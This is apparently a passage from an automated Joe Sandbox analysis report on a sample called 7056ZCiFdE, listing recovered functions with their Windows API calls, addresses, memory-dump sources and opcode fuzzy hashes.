                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: b5befe4ba557ff3568d7852351e1503827492077def336a42268e0022c2dacfa
                                    • Instruction ID: abea66c6458aa92d35e097baca26d2f393eaf301b899e573cf5584f0d5cd23d5
                                    • Opcode Fuzzy Hash: b5befe4ba557ff3568d7852351e1503827492077def336a42268e0022c2dacfa
                                    • Instruction Fuzzy Hash: A2118E726002059FDB10EF29D845A2AF7E9FF85324F04852EF9AAC7291DB30A905CB81
                                    Function 0090C57D Relevance: 3.0, APIs: 2, Instructions: 46nativewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,008BB93A,?,?,?), ref: 0090C5F1
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0090C5D7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LongWindow$DialogMessageNtdllProc_Send
                                    • String ID:
                                    • API String ID: 1273190321-0
                                    • Opcode ID: 0d4468889ece4b2ea343981ffe65f414f83afc6d263020e9378c7d768d38d948
                                    • Instruction ID: 24f0d5a74c49a175fbdd26be34c8097c61d3d4283342d609a3cf1be8ce8e5256
                                    • Opcode Fuzzy Hash: 0d4468889ece4b2ea343981ffe65f414f83afc6d263020e9378c7d768d38d948
                                    • Instruction Fuzzy Hash: 8701D875204314EFCB259F58CC54F6A3BA6FF89364F140624F9415B3E1CB31A802EB91
                                    Function 0090C93E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 0090C961
                                    • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,008BBA16,?,?,?,?,?), ref: 0090C98A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ClientDialogNtdllProc_Screen
                                    • String ID:
                                    • API String ID: 3420055661-0
                                    • Opcode ID: 29298b2be521c1cd762c6bc2f3f4dfd674e49e287e1e2d66abe87722b1d82d3a
                                    • Instruction ID: f32f54171bdb11c986bfb7b894effcc2ebe0dd856d075246bdf8dcc8c5e74df0
                                    • Opcode Fuzzy Hash: 29298b2be521c1cd762c6bc2f3f4dfd674e49e287e1e2d66abe87722b1d82d3a
                                    • Instruction Fuzzy Hash: A3F03A7241021CFFEF148F85DC09DBE7BB9FB48311F00416AF901A2161D7716A60EBA4
                                    Function 008EA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,008F9468,?,0090FB84,?), ref: 008EA097
                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,008F9468,?,0090FB84,?), ref: 008EA0A9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID:
                                    • API String ID: 3479602957-0
                                    • Opcode ID: 15818bdf094589c4a102a8316b2031ca2c5dbc50fec88d7b96cdd54278513138
                                    • Instruction ID: edefc76eea292231ceab70cab111b9aee16c8a8e42daec6c24b9da00ae2f8510
                                    • Opcode Fuzzy Hash: 15818bdf094589c4a102a8316b2031ca2c5dbc50fec88d7b96cdd54278513138
                                    • Instruction Fuzzy Hash: 4EF0823511522DABDB21AFA8CC48FEA776CFF09761F004165F919D6181D630AA40CBA2
                                    Function 0090CA7C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 0090CA84
                                    • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,008BB995,?,?,?,?), ref: 0090CAB2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 53746f7db9c26f8c902d828b401b33ea0158bbb737a68edc093437a829ed3385
                                    • Instruction ID: eac2d766ad75f72e25fe695c92a4bce3c6e31a0f91a5469c800487c409f9158b
                                    • Opcode Fuzzy Hash: 53746f7db9c26f8c902d828b401b33ea0158bbb737a68edc093437a829ed3385
                                    • Instruction Fuzzy Hash: E4E02670204208BFEB24CF19CC1AFBA3B58EB00750F408215F856D90E1C7709850E760
                                    Function 008D81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,008D8309), ref: 008D81E0
                                    • CloseHandle.KERNEL32(?,?,008D8309), ref: 008D81F2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: AdjustCloseHandlePrivilegesToken
                                    • String ID:
                                    • API String ID: 81990902-0
                                    • Opcode ID: a93696e754b10c204bc7f49e6839119319274e1d8bc70ac5d81a40ec23ef3211
                                    • Instruction ID: ad279494a6b2f5c191bca292e39dd2d274b52e145bbe6b4705099e1dcafbb8e6
                                    • Opcode Fuzzy Hash: a93696e754b10c204bc7f49e6839119319274e1d8bc70ac5d81a40ec23ef3211
                                    • Instruction Fuzzy Hash: 9CE0BF71014610AFEB252B64EC05D7777A9FB043507148929B455C4870DB615DA1EB10
                                    Function 008AA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,00914178,008A8D57,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 008AA15A
                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 008AA163
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                                    • Instruction ID: 9d347e03e5b74be8134238d89a5eea68c94aab785514f3cc65498f40629212e8
                                    • Opcode Fuzzy Hash: 51a495a159cab6803cbc68138de310a13b24e57c01020751a212f572f9660495
                                    • Instruction Fuzzy Hash: 10B0923106C208AFCA102B91EC19B883FA8EB45BF2F404020F60D84860CB625650AA91
                                    Function 008AF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                                    • Instruction ID: 8f3b23ff751fbacf903e686293dc0226f37bfaa1dc8caabf731c47e4240f7708
                                    • Opcode Fuzzy Hash: e0ccb0add191aad47d08a6b88cb90e413dbe13d99f8674a70cf6e0f6813c02f1
                                    • Instruction Fuzzy Hash: 33320321E6DF014DE7239674D822336A659EFB73C4F15D737E82AB5DA6EB28C4839100
                                    Function 008B242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                                    • Instruction ID: 9c460e63e6c13706d1e3be28c58541e9e1442563002f94fdc7fa1ffc5ab2a25e
                                    • Opcode Fuzzy Hash: 1c00e6746de87d5a6cb879f57804fe6d0d2ddef27b7eac2bb51802597a946444
                                    • Instruction Fuzzy Hash: 73B1E020E3AF514DD32396398831336BA5CAFBB2D5F51D71BFC2A74D62EB2189839141
                                    Function 008E8889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • __time64.LIBCMT ref: 008E889B
                                      • Part of subcall function 008A520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,008E8F6E,00000000,?,?,?,?,008E911F,00000000,?), ref: 008A5213
                                      • Part of subcall function 008A520A: __aulldiv.LIBCMT ref: 008A5233
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Time$FileSystem__aulldiv__time64
                                    • String ID:
                                    • API String ID: 2893107130-0
                                    • Opcode ID: f6b95af3ad7d76740f13e7a42c6f374815347677d36e3553246b66777733231a
                                    • Instruction ID: 0d9afd5857af99b48cf15561a0532a637660d5bd66b251d266a464f75e16b24b
                                    • Opcode Fuzzy Hash: f6b95af3ad7d76740f13e7a42c6f374815347677d36e3553246b66777733231a
                                    • Instruction Fuzzy Hash: F321D576635510CBC329CF29D441A52B3E1EFA6310B288E6CE4F5CB2C0CA34A945DB54
                                    Function 0090D78C Relevance: 1.6, APIs: 1, Instructions: 66nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 0090D838
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 939e2727fc5d4b301309b9f40083a91db60fb79bb5876baff5ec46a4c788738f
                                    • Instruction ID: f56cead7ac4506370f3d4eae11e3ca12f5b8070aa71b1fef893a0dcd5b7b193a
                                    • Opcode Fuzzy Hash: 939e2727fc5d4b301309b9f40083a91db60fb79bb5876baff5ec46a4c788738f
                                    • Instruction Fuzzy Hash: 93112C75205215BFFB359EACCC06F7A3B5CDB42B20F208724F9119A5E3CB649D10A3A5
                                    Function 0090D3B8 Relevance: 1.5, APIs: 1, Instructions: 47nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 008825DB: GetWindowLongW.USER32(?,000000EB), ref: 008825EC
                                    • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,008BB952,?,?,?,?,00000000,?), ref: 0090D432
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: 1e06d6eea52b015c1f67bb660b9d9725e491164f7c252f5f664c258b7a8b36cb
                                    • Instruction ID: 01c895bcdd2e711aa583a6cabf9f0fd3dac68d0a76c902304d62e3b67ab47492
                                    • Opcode Fuzzy Hash: 1e06d6eea52b015c1f67bb660b9d9725e491164f7c252f5f664c258b7a8b36cb
                                    • Instruction Fuzzy Hash: 3601D431601114AFDB24DFA9C849FBA3BAAEF46325F444125F9565B2E2C331BC12D7A0
                                    Function 0088189B Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                    • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00881B04,?,?,?,?,?), ref: 008818E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DialogLongNtdllProc_Window
                                    • String ID:
                                    • API String ID: 2065330234-0
                                    • Opcode ID: f856c8e2ec9a65e2b3865cdafd3c4907b71c25b6d6389a9ad23855bcfd89564e
                                    • Instruction ID: 8a374d2dc7e71a3d44dc2b3ec125aeb1b18d05c56bfe3ddb9254b13590bdf319
                                    • Opcode Fuzzy Hash: f856c8e2ec9a65e2b3865cdafd3c4907b71c25b6d6389a9ad23855bcfd89564e
                                    • Instruction Fuzzy Hash: 60F0BE34210219DFCF18EF48C855D3637E6FB00310F504139F8528B2A2DB31D950EB50
                                    Function 0090C8BE Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0090C8FE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_
                                    • String ID:
                                    • API String ID: 3239928679-0
                                    • Opcode ID: 763bb0d8dc6146b9a5e8e63257b5560206b27633913a6cf47f517f8de6e461be
                                    • Instruction ID: de18dab9d62a24f35c2723e1891a41e90dd337a46032b8b17aa33c336146c7dc
                                    • Opcode Fuzzy Hash: 763bb0d8dc6146b9a5e8e63257b5560206b27633913a6cf47f517f8de6e461be
                                    • Instruction Fuzzy Hash: 01F06D35214255FFDB21DF58DC05FD63B95EB09720F048018FA11672E2CB706920E7A0
                                    Function 008E4C27 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                    Download Yara Rule
                                    APIs
                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 008E4C4A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: mouse_event
                                    • String ID:
                                    • API String ID: 2434400541-0
                                    • Opcode ID: a5ef24d10b3b4bc5e803ae3ed3d417009531fffef7c4392a7482d27603d327a4
                                    • Instruction ID: fc784cacbbb61241a23d8ff9e15a5dd68d2d58e5c0e7c38cbbe5eed198bbb479
                                    • Opcode Fuzzy Hash: a5ef24d10b3b4bc5e803ae3ed3d417009531fffef7c4392a7482d27603d327a4
                                    • Instruction Fuzzy Hash: 8CD05E9116928D38EC2C07229E1FF7E0148F343796FF0B1897109CB0C1ECA05C406031
                                    Function 008D87B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,008D8389), ref: 008D87D1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: LogonUser
                                    • String ID:
                                    • API String ID: 1244722697-0
                                    • Opcode ID: daaca7d97e3745f0f9de32bf002d14655b14787bfbd318777ed96f4fd60f1e52
